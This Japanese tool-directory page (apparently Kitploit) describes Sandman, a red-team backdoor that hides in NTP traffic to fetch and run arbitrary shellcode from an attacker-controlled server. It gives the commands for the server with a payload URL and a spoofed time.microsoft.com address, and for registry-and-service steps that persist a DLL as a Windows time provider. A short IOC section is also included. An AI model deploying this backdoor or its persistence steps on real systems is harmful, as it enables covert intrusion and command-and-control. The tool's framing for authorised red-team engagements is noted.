Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Sandman — 強化されたネットワーク向けNTPベースのバックドア。偽装されたNTPトラフィックを介して任意のシェルコードを配信・実行し、Windows タイムプロバイダとしてのオプションの永続化機能を備えています。 | Kitploit
ツール/GitHubGitHub/idov31/sandman
ペイロード生成永続化メカニズムシェルコードコマンド&コントロールレッドチーミング
GitHubidov31/sandman

Sandman

強化されたネットワーク向けNTPベースのバックドア。偽装されたNTPトラフィックを介して任意のシェルコードを配信・実行し、Windows タイムプロバイダとしてのオプションの永続化機能を備えています。

リポジトリを見る
8161112年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Sandman

Image image image

Sandmanは、レッドチームのエンゲージメント中に厳格化されたネットワークで動作するように設計されたバックドアです。

Sandmanはステージャーとして動作し、NTP(時刻と日付を同期するプロトコル)を利用して、事前定義されたサーバーから任意のシェルコードを取得・実行します。

NTPは多くの防御者に見落とされがちなプロトコルであり、その結果、広範なネットワークアクセスが可能となります。

使用方法

Sandman

SandmanServer (使用方法)

Windows / *nix マシンで実行:

root@kitploit:~
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
  • ネットワークアダプタ: サーバーがリッスンするアダプタ(例: Windowsの場合はEthernet、*nixの場合はeth0)。

  • ペイロードURL: シェルコードのURL。エージェント(例: CobaltStrikeやmeterpreter)または別のステージャーです。

  • なりすますIP: 正当なIPアドレス(例: time.microsoft.comのIPアドレス)になりすます場合に指定します。

SandmanBackdoor (使用方法)

開始するには、後述のようにSandmanBackdoorをコンパイルします。これは単一の軽量なC#実行可能ファイルであり、ExecuteAssemblyを介して実行したり、NTPプロバイダーとして実行したり、単に実行/インジェクトしたりできます。

SandmanBackdoorTimeProvider (使用方法)

使用するには、以下の簡単な手順に従います:

  • 次のレジストリ値を追加:
root@kitploit:~
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
  • w32timeサービスを再起動:
root@kitploit:~
sc stop w32time
sc start w32time

注意: x64オプションでコンパイルし、Any CPUオプションを使用しないでください!

機能

  • 攻撃者が制御するサーバーから任意のペイロードを取得して実行。

  • NTPは通常ファイアウォールで許可されるため、厳格化されたネットワークでも動作可能。

  • IPスプーフィングによる正当なNTPサーバーのなりすまし。

セットアップ

SandmanServer (セットアップ)

  • Python 3.9

  • 依存関係はrequirementsファイルに指定されています。

SandmanBackdoor (セットアップ)

バックドアのコンパイルにはVisual Studio 2022を使用しましたが、使用方法で述べたように、VS2022とCSCの両方でコンパイルできます。

USE_SHELLCODEを使用してOrcaのシェルコードを使うか、USE_SHELLCODEなしでWebClientを使用するかのいずれかでコンパイルできます。

SandmanBackdoorTimeProvider (セットアップ)

バックドアのコンパイルにはVisual Studio 2022を使用しました。コンパイルするには、DllExport(Nuget経由など)もインストールする必要があります。

USE_SHELLCODEを使用してOrcaのシェルコードを使うか、USE_SHELLCODEなしでWebClientを使用するかのいずれかでコンパイルできます。

IOCs

  • RuntimeBrokerにシェルコードが注入されます。

  • 既知のマジックヘッダーで始まる不審なNTP通信。

  • YARAルール。

貢献者

  • Orca - シェルコードの提供。

  • Tim McGuffin氏にタイムプロバイダのアイデアについて特別に感謝します。

既に貢献してくださった方々に感謝します。これからも貢献を歓迎します。プルリクエストを作成してください。レビューします!

ツールをダウンロード